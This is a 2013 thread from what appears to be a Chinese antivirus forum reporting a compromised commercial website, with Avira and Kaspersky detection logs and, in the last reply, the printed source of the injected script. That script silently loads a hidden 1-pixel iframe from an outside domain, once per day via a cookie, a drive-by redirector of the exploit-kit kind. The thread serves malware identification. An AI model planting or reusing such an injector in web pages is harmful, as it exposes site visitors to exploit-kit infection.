查看: 1068|回复: 3
收起左侧

[已鉴定] http://www.comercialpedrogarcia.com/【挂马BY哀酱】

[复制链接]
fireold
发表于 2013-8-5 19:18:15 | 显示全部楼层 |阅读模式
本帖最后由 哀酱俏佳人 于 2013-8-6 23:29 编辑



Avira
2013/8/5 下午 07:10 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\cloudzoom[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '54402ac5.qua' 名稱底下的隔離區目錄。.

2013/8/5 下午 07:10 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        862
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/8/5 下午 07:09 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\jv.script.js[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '5580298f.qua' 名稱底下的隔離區目錄。.

2013/8/5 下午 07:09 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        833
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/8/5 下午 07:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\cloudzoom[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/5 下午 07:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\cloudzoom[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/8/5 下午 07:08 [Web Protection] 發現惡意程式碼
      從 URL "http://www.comercialpedrogarcia.com/plugins/system/jv_zoom/cloudzoom.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/5 下午 07:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\jv.script.js[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/5 下午 07:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\jv.script.js[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/8/5 下午 07:08 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.comercialpedrogarcia.com/templates/jv_dilo/js/jv.script.js.php"
      存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/5 下午 07:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\comercialpedrogarcia_com[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.29 [virus]'
      執行的動作:拒絕存取

2013/8/5 下午 07:08 [Web Protection] 發現惡意程式碼
      從 URL "http://www.comercialpedrogarcia.com/" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]。
      已採取動作:已略過



fs1.jpg
3801187
发表于 2013-8-6 15:31:02 | 显示全部楼层
2013-08-06_153054.png
zst470396853
发表于 2013-8-6 18:05:11 | 显示全部楼层
卡巴斯基安全部队
2013
拒绝访问
无法访问该网页

请求对象位于网址:

http://www.comercialpedrogarcia.com

已检测到的威胁:

对象感染源 Trojan.JS.Iframe.aez
哀酱俏佳人
发表于 2013-8-6 23:29:34 | 显示全部楼层
  1. function zzzfff(){
  2.   var udv = document.createElement('iframe');
  3.   udv.src = 'http://ueno-hiroshima.main.jp/dtd.php';
  4.   udv.style.position = 'absolute';
  5.   udv.style.border = '0';
  6.   udv.style.height = '1px';
  7.   udv.style.width = '1px';
  8.   udv.style.left = '1px';
  9.   udv.style.top = '1px';
  10.   if (!document.getElementById('udv')){
  11.     document.write('<div id=\'udv\'></div>');
  12.     document.getElementById('udv').appendChild(udv);
  13.   }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path){
  16.   var today = new Date();
  17.   var expire = new Date();
  18.   if (nDays == null || nDays == 0)nDays = 1;
  19.   expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.   document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  21.   toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name){
  24.   var start = document.cookie.indexOf(name + "=");
  25.   var len = start + name.length + 1;
  26.   if ((!start) && (name != document.cookie.substring(0, name.length))){
  27.     return null;
  28.   }
  29.   if (start ==  - 1)return null;
  30.   var end = document.cookie.indexOf(";", len);
  31.   if (end ==  - 1)end = document.cookie.length;
  32.   return unescape(document.cookie.substring(len, end));
  33. }
  34. if (navigator.cookieEnabled){
  35.   if (GetCookie('visited_uq') == 55){
  36.   }
  37.   else {
  38.     SetCookie('visited_uq', '55', '1', '/');
  39.     zzzfff();
  40.   }
  41. }
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-26 00:35 , Processed in 0.137875 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表